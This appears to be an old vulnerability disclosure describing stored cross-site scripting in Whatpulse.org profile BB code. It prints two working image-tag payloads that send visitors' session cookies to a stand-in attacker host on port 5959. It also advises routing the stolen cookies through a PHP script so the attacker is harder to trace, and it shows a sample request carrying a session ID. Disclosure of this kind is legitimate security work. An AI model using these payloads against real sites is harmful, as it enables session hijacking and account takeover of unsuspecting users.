Vulnerability in Whatpulse.Org profiles allows XSS and session hijacking

[rift13@xxxxxxxxxxx]

Whatpulse.org is a site that provides software to allower users to keep track 
of how many keystrokes they have entered and 'pulse' them to the website and 
view who has the most keys to date, etc.  Whatpulse has a profile feature that 
lets a user describe a little bit about themself to otherusers.  The 
vulnerability lies within the profile's allowance of unsanitized BB code.  Here 
is the example code:


[IMG=Javascript:document.write('><iframe src=http://attackerip:5959?' + 
document.cookie + '  height=1% width=1%></iframe>');][/IMG]

[IMG="asdf" onMouseMove="document.write('-<iframe src=http://attackerip:5959?' 
+ document.cookie + ' scrolling=no hspace=0 vspace=0 height=1% frameborder=0 
width=1%></iframe>')""" style="Z-INDEX: 100; LEFT: 0px; POSITION: absolute; 
TOP: 0px; height:2000px; width:8000px;"]asdf[/IMG]



there is a line break in the code.  the top image tag works for IE users, the 
second image tag works for mozilla users, the second one is triggered by moving 
the mouse over the webpage.  The above example will connect to the attacker's 
ip address on a listening port, in this case 5959 and request a page, in this 
case it will request a page named after their session cookie, giving the 
attacker their session id.  This of course can be modified to submit to a php 
application helping to cloak the attacker from identification.  When you submit 
the user cookie you submit it in the Get request, for example:

GET /?PHPSESSID=eec5a9da58ecd36422e53dc89194af15; HTTP/1.1